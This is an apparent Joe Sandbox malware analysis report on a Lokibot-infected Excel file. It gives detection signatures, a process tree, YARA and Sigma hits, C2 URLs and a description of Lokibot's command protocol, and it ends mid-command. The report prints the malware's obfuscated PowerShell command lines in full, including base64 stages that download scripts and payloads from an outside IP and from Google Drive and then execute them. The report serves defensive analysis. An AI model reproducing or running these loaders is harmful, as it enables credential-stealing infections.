Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx

Overview

General Information

Sample name:SecuriteInfo.com.W97M.DownLoader.6515.29545.30613.xlsx
Analysis ID:1541460
MD5:ad791e87a785989bf5dc066db100e652
SHA1:dabe7215a329944fd262906aae16b9c9ec689c0e
SHA256:26daad7f2b88dfa67240b07b416d9261909f0398e17e8a62e29a8e324d49d94d
Tags:xlsx
Infos:

Detection

Lokibot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Lokibot
Yara detected Powershell download and execute
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs new ROOT certificates
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected aPLib compressed binary
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches the installation path of Mozilla Firefox
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3596 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • mshta.exe (PID: 3868 cmdline: C:\Windows\System32\mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5)
      • powershell.exe (PID: 4008 cmdline: "C:\Windows\SysTeM32\WInDOwsPOweRSheLL\V1.0\PoWErSHEll.EXE" "powErShEll -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe ; Iex($(iex('[sYStEm.TexT.eNcODInG]'+[chAr]58+[ChaR]0x3A+'utF8.getsTRinG([systEM.ConvERt]'+[cHAr]58+[ChAr]58+'FrombASE64sTrInG('+[ChaR]0x22+'JGI0bEg4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhREQtVFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJFcmRlZklOSVRJb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT24uRGxMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHpsR2dqcHBFLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRFlCbFcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwSXlHVnUsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgayxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIE9JVGloSlJ5WSk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJTIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTUVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWXdvQmNHT2duaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJGI0bEg4OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTc2LjE0MS8zNS9lZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnRJRiIsIiRFTnY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyIsMCwwKTtzdGFSVC1zbEVlUCgzKTtzVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFblY6QVBQREFUQVxlZHVjYXRpb25hbHRoaW5nc3dpdGhncmVhdGF0dGl0dWRlb25oZXJlLnZiUyI='+[CHAR]0X22+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • powershell.exe (PID: 3116 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex Bypass -Nop -w 1 -c deVICECrEdenTIaLDePlOYMENT.exe MD5: A575A7610E5F003CC36DF39E07C4BA7D)
        • csc.exe (PID: 3328 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\mgcx3ou4\mgcx3ou4.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1)
          • cvtres.exe (PID: 3352 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB606.tmp" "c:\Users\user\AppData\Local\Temp\mgcx3ou4\CSCC6F130116CCE49C39BB61052DD4B9AF.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
        • wscript.exe (PID: 3028 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\educationalthingswithgreatattitudeonhere.vbS" MD5: 045451FA238A75305CC26AC982472367)
          • powershell.exe (PID: 3036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D)
            • powershell.exe (PID: 1224 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )" MD5: A575A7610E5F003CC36DF39E07C4BA7D)
              • AddInProcess32.exe (PID: 1488 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" MD5: EFBCDD2A3EBEA841996AEF00417AA958)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Loki Password Stealer (PWS), LokiBot"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2
  • SWEED
  • The Gorgon Group
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws
{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "\u00c6\u00cb\u00d1\u00ce\u00ca\u00c9\u00d1\u00ce\u00c8\u00c8\u00d1\u00cd\u00cd\u00cf\u00d0\u008c\u0096\u0092\u008f\u0093\u009a\u00d0\u0099\u0096\u0089\u009a\u00d0\u0099\u008d\u009a\u00d1\u008f\u0097\u008f"]}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Lokibot_1Yara detected LokibotJoe Security
    SourceRuleDescriptionAuthorStrings
    00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_LokibotYara detected LokibotJoe Security
      00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
        00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_1f885282unknownunknown
          • 0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
          00000010.00000002.620879687.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Lokibot_0f421617unknownunknown
          • 0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
          Click to see the 11 entries
          SourceRuleDescriptionAuthorStrings
          16.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_LokibotYara detected LokibotJoe Security
            16.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_aPLib_compressed_binaryYara detected aPLib compressed binaryJoe Security
              16.2.AddInProcess32.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                16.2.AddInProcess32.exe.400000.0.unpackWindows_Trojan_Lokibot_1f885282unknownunknown
                • 0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
                16.2.AddInProcess32.exe.400000.0.unpackWindows_Trojan_Lokibot_0f421617unknownunknown
                • 0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
                Click to see the 11 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0nKycgMFFhaW1hZ2VUZXh0LkluZGV4T2YoMFFhZW5kRmxhZyk7MFFhc3RhcnRJbmRleCAtZ2UgMCAtJysnYW5kIDBRYWVuZEluZGV4IC1ndCAwUWFzdGFydEluZGV4OzBRYXN0YXJ0SW5kZXggKz0gMFFhc3RhcnRGbGFnLkxlbmd0aDswUWFiJysnYXNlNjRMZW5ndGggJysnPSAwUWFlbmRJbmRleCAtIDBRYXN0YXJ0SW5kZXg7MCcrJ1FhYmFzZTY0Q29tbWFuZCA9IDBRYWltYWdlVGV4dC5TdWJzdHJpbmcoMFFhc3RhcnRJbmRleCwgMFFhYmFzZScrJzY0TGVuZ3RoKTswUWFiYXNlNjRSZXZlcnNlJysnZCA9IC1qb2luICgwUWFiYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgWWJJIEZvckVhY2gtT2JqZWN0IHsgMFFhXyB9KVstMS4uLSgwUWFiYXNlNjRDb21tYScrJ25kLkxlbmd0aCldOzBRYWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoMFFhYmFzZTY0UmV2ZXJzZWQpOzBRYWxvYWRlZEFzJysnc2VtYmx5ID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCgwUWFjb21tYW5kQnl0ZXMpOzBRYXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoZjdWVkFJZjdWKTswUWF2YWlNZXRob2QuSW52b2tlKDBRYW51bGwsIEAoZjdWdHh0LlJSRVBMTVMvNTMvMTQxLjY3MS4zLjI5MS8vOnB0dGhmN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGY3VmRlc2F0aXZhZG9mN1YsIGYnKyc3VkFkZEluUHJvY2VzczMyZjdWLCBmN1ZkZXNhdCcrJ2l2YWRvZjdWLCBmN1ZkZXMnKydhdGl2YWRvZjdWLGY3VmRlc2F0aXZhZG9mN1YsJysnZjdWZGVzYXRpdmFkb2Y3VixmN1ZkZXNhdGknKyd2YWRvZjdWJysnLGY3VmRlc2F0JysnaXZhZG9mN1YsZjdWZGVzYXRpdmFkb2Y3VixmN1YxZjdWLGY3VmRlc2F0aXZhZG9mN1YpKTsnKS5SZXBsQUNFKChbY2hBcl04OStbY2hBcl05OCtbY2hBcl03MyksJ3wnKS5SZXBsQUNFKCdmN1YnLFtTdHJJTkddW2NoQXJdMzkpLlJlcGxBQ0UoKFtjaEFyXTQ4K1tjaEFyXTgxK1tjaEFyXTk3KSwnJCcpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiAoICRFTnY6Q29tU3BlQ1s0LDE1LDI1XS1Kb0luJycpKCAoJzBRYWltYWdlVXJsID0gZjdWaHQnKyd0cHM6Ly8nKydkcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xQUlWZ0pKSnYxRjZ2UzRzVU95Ym5ILXNEdlVoQll3dScrJ3IgZjdWOzBRYXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7MFFhaW1hZ2VCeXRlcyA9IDBRYXdlYkNsaWVudC5Eb3dubG9hZERhdGEoMFFhaW1hZ2VVcmwnKycpOycrJzBRYWltYWdlVGV4dCA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDBRYWltYWdlQnl0ZXMpOzBRYXN0YXJ0RmxhZyA9IGY3Vjw8QkFTRTY0X1NUQVJUPj5mN1Y7MFFhZW5kRmxhZyA9IGY3Vjw8QkFTRTY0X0VORD4+ZjdWOycrJzBRYXN0YXJ0SW5kZXggPSAwUWFpbWFnJysnZVRleHQuSW5kZXhPZigwUWFzdGFyJysndEZsYWcpOzBRYWVuZEluZGV4ID0n
                Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3596, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\nicegirlwithnewthingswhichevennobodknowthatkissingme[1].hta
                Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = [System.Convert]::FromBase64String(0Qabase64Reversed);0QaloadedAs'+'sembly = [System.Reflection.Assembly]::'+'Load(0QacommandBytes);0QavaiMethod = [dnlib.IO.Home].GetMethod(f7VVAIf7V);0QavaiMethod.Invoke(0Qanull, @(f7Vtxt.RREPLMS/53/141.671.3.291//:ptthf7V, f7Vdesativadof7V, f7Vdesativadof7V, f7Vdesativadof7V, f'+'7VAddInProcess32f7V, f7Vdesat'+'ivadof7V, f7Vdes'+'ativadof7V,f7Vdesativadof7V,'+'f7Vdesativadof7V,f7Vdesati'+'vadof7V'+',f7Vdesat'+'ivadof7V,f7Vdesativadof7V,f7V1f7V,f7Vdesativadof7V));').ReplACE(([chAr]89+[chAr]98+[chAr]73),'|').ReplACE('f7V',[StrING][chAr]39).ReplACE(([chAr]48+[chAr]81+[chAr]97),'$') )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $ENv:ComSpeC[4,15,25]-JoIn'')( ('0QaimageUrl = f7Vht'+'tps://'+'drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwu'+'r f7V;0QawebClient = New-Object System.Net.WebClient;0QaimageBytes = 0QawebClient.DownloadData(0QaimageUrl'+');'+'0QaimageText = [System.Text.Encoding]::UTF8.GetString(0QaimageBytes);0QastartFlag = f7V<<BASE64_START>>f7V;0QaendFlag = f7V<<BASE64_END>>f7V;'+'0QastartIndex = 0Qaimag'+'eText.IndexOf(0Qastar'+'tFlag);0QaendIndex ='+' 0QaimageText.IndexOf(0QaendFlag);0QastartIndex -ge 0 -'+'and 0QaendIndex -gt 0QastartIndex;0QastartIndex += 0QastartFlag.Length;0Qab'+'ase64Length '+'= 0QaendIndex - 0QastartIndex;0'+'Qabase64Command = 0QaimageText.Substring(0QastartIndex, 0Qabase'+'64Length);0Qabase64Reverse'+'d = -join (0Qabase64Command.ToCharArray() YbI ForEach-Object { 0Qa_ })[-1..-(0Qabase64Comma'+'nd.Length)];0QacommandBytes = 